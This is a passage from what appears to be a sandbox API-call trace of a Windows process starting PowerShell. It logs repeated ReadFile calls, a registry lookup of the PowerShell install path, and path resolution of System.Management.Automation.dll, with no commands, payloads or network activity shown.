	[0523.847] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.847] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.847] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.847] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.848] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.848] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.848] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.848] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.849] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0523.849] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.820] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.821] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.821] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.821] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.822] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.822] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.822] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.822] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.822] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.823] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.823] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.823] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.823] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.824] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.824] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.824] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.824] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.824] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.825] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.825] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.825] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.825] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.826] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.826] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.826] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.826] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.827] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.827] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.827] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.828] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0524.828] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0xf37, lpOverlapped=0x0) returned 1
	[0524.828] ReadFile (in: hFile=0x324, lpBuffer=0x2eb3a0f, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb3a0f*, lpNumberOfBytesRead=0x12cf18*=0x0, lpOverlapped=0x0) returned 1
	[0524.828] ReadFile (in: hFile=0x324, lpBuffer=0x2eb4370, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x2eb4370*, lpNumberOfBytesRead=0x12cf18*=0x0, lpOverlapped=0x0) returned 1
	[0524.829] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12cfa8 | out: phkResult=0x12cfa8*=0x324) returned 0x0
	[0524.829] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cf2c, lpData=0x0, lpcbData=0x12cf28*=0x0 | out: lpType=0x12cf2c*=0x1, lpData=0x0, lpcbData=0x12cf28*=0x56) returned 0x0
	[0524.829] CoTaskMemAlloc (cb=0x5a) returned 0x3b3da0
	[0524.829] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cefc, lpData=0x3b3da0, lpcbData=0x12cef8*=0x56 | out: lpType=0x12cefc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12cef8*=0x56) returned 0x0
	[0524.829] CoTaskMemFree (pv=0x3b3da0) 
	[0524.829] RegCloseKey (hKey=0x324) returned 0x0
	[0524.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0524.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0524.834] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xedc93b55, Data2=0x89f4, Data3=0x4e54, Data4=([0]=0x80, [1]=0xde, [2]=0x88, [3]=0x3, [4]=0x33, [5]=0xcc, [6]=0x16, [7]=0xa5))) returned 0x0
	[0524.834] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x1d2f2053, Data2=0x9731, Data3=0x4d45, Data4=([0]=0x88, [1]=0x18, [2]=0xd, [3]=0x67, [4]=0x5e, [5]=0x34, [6]=0xe8, [7]=0x29))) returned 0x0
	[0524.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.851] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xf3c9b606, Data2=0x9a0e, Data3=0x45c5, Data4=([0]=0x93, [1]=0x32, [2]=0x31, [3]=0x79, [4]=0xf, [5]=0x6d, [6]=0x7d, [7]=0xc8))) returned 0x0
	[0524.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.856] VirtualQuery (in: lpAddress=0x12b1e0, lpBuffer=0x12c0a0, dwLength=0x30 | out: lpBuffer=0x12c0a0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0524.858] VirtualQuery (in: lpAddress=0x12b270, lpBuffer=0x12c130, dwLength=0x30 | out: lpBuffer=0x12c130*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0524.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.860] VirtualQuery (in: lpAddress=0x12b9f0, lpBuffer=0x12c8b0, dwLength=0x30 | out: lpBuffer=0x12c8b0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0524.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
